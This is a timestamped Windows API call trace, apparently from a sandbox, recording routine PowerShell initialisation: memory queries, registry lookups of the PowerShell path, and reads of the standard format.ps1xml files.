[0078.910] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.910] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.910] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.915] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.920] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.920] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.921] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.921] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.921] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.922] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.922] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.922] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.922] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.922] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.923] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.923] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.923] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.925] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.927] VirtualQuery (in: lpAddress=0x10bd00, lpBuffer=0x10cbc0, dwLength=0x30 | out: lpBuffer=0x10cbc0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.928] VirtualQuery (in: lpAddress=0x10bd00, lpBuffer=0x10cbc0, dwLength=0x30 | out: lpBuffer=0x10cbc0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.928] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0078.929] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.083] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.084] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.084] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.086] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0079.086] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0079.086] CoTaskMemFree (pv=0x229db0)
[0079.149] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.180] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.180] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.180] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.181] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.181] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.181] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.182] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.206] VirtualQuery (in: lpAddress=0x10bcf0, lpBuffer=0x10cbb0, dwLength=0x30 | out: lpBuffer=0x10cbb0*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.206] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d1a8 | out: phkResult=0x10d1a8*=0x308) returned 0x0
[0079.206] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x10d1bc, lpData=0x0, lpcbData=0x10d1b8*=0x0 | out: lpType=0x10d1bc*=0x1, lpData=0x0, lpcbData=0x10d1b8*=0x74) returned 0x0
[0079.206] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x10d12c, lpData=0x0, lpcbData=0x10d128*=0x0 | out: lpType=0x10d12c*=0x1, lpData=0x0, lpcbData=0x10d128*=0x74) returned 0x0
[0079.206] CoTaskMemAlloc (cb=0x78) returned 0x1bfd60
[0079.206] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x10d0fc, lpData=0x1bfd60, lpcbData=0x10d0f8*=0x74 | out: lpType=0x10d0fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x10d0f8*=0x74) returned 0x0
[0079.206] CoTaskMemFree (pv=0x1bfd60)
[0079.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x10ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
[0079.207] SetErrorMode (uMode=0x1) returned 0x1
[0079.207] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x10d080 | out: lpFileInformation=0x10d080*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0079.207] SetErrorMode (uMode=0x1) returned 0x1
[0079.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.207] SetErrorMode (uMode=0x1) returned 0x1
[0079.207] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d080 | out: lpFileInformation=0x10d080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
[0079.208] SetErrorMode (uMode=0x1) returned 0x1
[0079.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
[0079.208] SetErrorMode (uMode=0x1) returned 0x1
[0079.208] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d080 | out: lpFileInformation=0x10d080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
[0079.208] SetErrorMode (uMode=0x1) returned 0x1
[0079.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.208] SetErrorMode (uMode=0x1) returned 0x1
[0079.208] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d080 | out: lpFileInformation=0x10d080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
[0079.209] SetErrorMode (uMode=0x1) returned 0x1
[0079.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.209] SetErrorMode (uMode=0x1) returned 0x1
[0079.209] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d080 | out: lpFileInformation=0x10d080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
[0079.209] SetErrorMode (uMode=0x1) returned 0x1
[0079.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
[0079.209] SetErrorMode (uMode=0x1) returned 0x1
[0079.209] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d080 | out: lpFileInformation=0x10d080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
[0079.210] SetErrorMode (uMode=0x1) returned 0x1
[0079.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
[0079.210] SetErrorMode (uMode=0x1) returned 0x1
[0079.210] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d080 | out: lpFileInformation=0x10d080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
[0079.210] SetErrorMode (uMode=0x1) returned 0x1
[0079.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
[0079.210] SetErrorMode (uMode=0x1) returned 0x1
[0079.210] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d080 | out: lpFileInformation=0x10d080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
[0079.210] SetErrorMode (uMode=0x1) returned 0x1
[0079.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
[0079.210] SetErrorMode (uMode=0x1) returned 0x1
[0079.210] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d080 | out: lpFileInformation=0x10d080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
[0079.211] SetErrorMode (uMode=0x1) returned 0x1
[0079.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
[0079.211] SetErrorMode (uMode=0x1) returned 0x1
[0079.211] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x10d080 | out: lpFileInformation=0x10d080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
[0079.211] SetErrorMode (uMode=0x1) returned 0x1
[0079.211] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0079.211] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0079.212] CoTaskMemFree (pv=0x229db0)
[0079.235] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0079.235] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0079.235] CoTaskMemFree (pv=0x229db0)
[0079.236] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0079.236] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0079.236] CoTaskMemFree (pv=0x229db0)
[0079.236] CoTaskMemAlloc (cb=0x104) returned 0x229db0
[0079.236] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229db0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0079.236] CoTaskMemFree (pv=0x229db0)
[0079.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.236] SetErrorMode (uMode=0x1) returned 0x1
[0079.236] SetErrorMode (uMode=0x1) returned 0x1
[0079.236] GetFileType (hFile=0x30c) returned 0x1
[0079.236] ReadFile (in: hFile=0x30c, lpBuffer=0x32dc570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x32dc570*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.252] ReadFile (in: hFile=0x30c, lpBuffer=0x32dc570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x32dc570*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.252] ReadFile (in: hFile=0x30c, lpBuffer=0x32dc570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x32dc570*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.253] ReadFile (in: hFile=0x30c, lpBuffer=0x32dc570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x32dc570*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.253] ReadFile (in: hFile=0x30c, lpBuffer=0x32dc570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x32dc570*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.253] ReadFile (in: hFile=0x30c, lpBuffer=0x32dc570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x32dc570*, lpNumberOfBytesRead=0x10cd18*=0x1000, lpOverlapped=0x0) returned 1
[0079.253] ReadFile (in: hFile=0x30c, lpBuffer=0x32dc570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x32dc570*, lpNumberOfBytesRead=0x10cd18*=0x9e2, lpOverlapped=0x0) returned 1
[0079.253] ReadFile (in: hFile=0x30c, lpBuffer=0x32dbaba, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x32dbaba*, lpNumberOfBytesRead=0x10cd18*=0x0, lpOverlapped=0x0) returned 1
[0079.253] ReadFile (in: hFile=0x30c, lpBuffer=0x32dc570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10cd18, lpOverlapped=0x0 | out: lpBuffer=0x32dc570*, lpNumberOfBytesRead=0x10cd18*=0x0, lpOverlapped=0x0) returned 1
[0079.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x10ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
[0079.256] SetErrorMode (uMode=0x1) returned 0x1
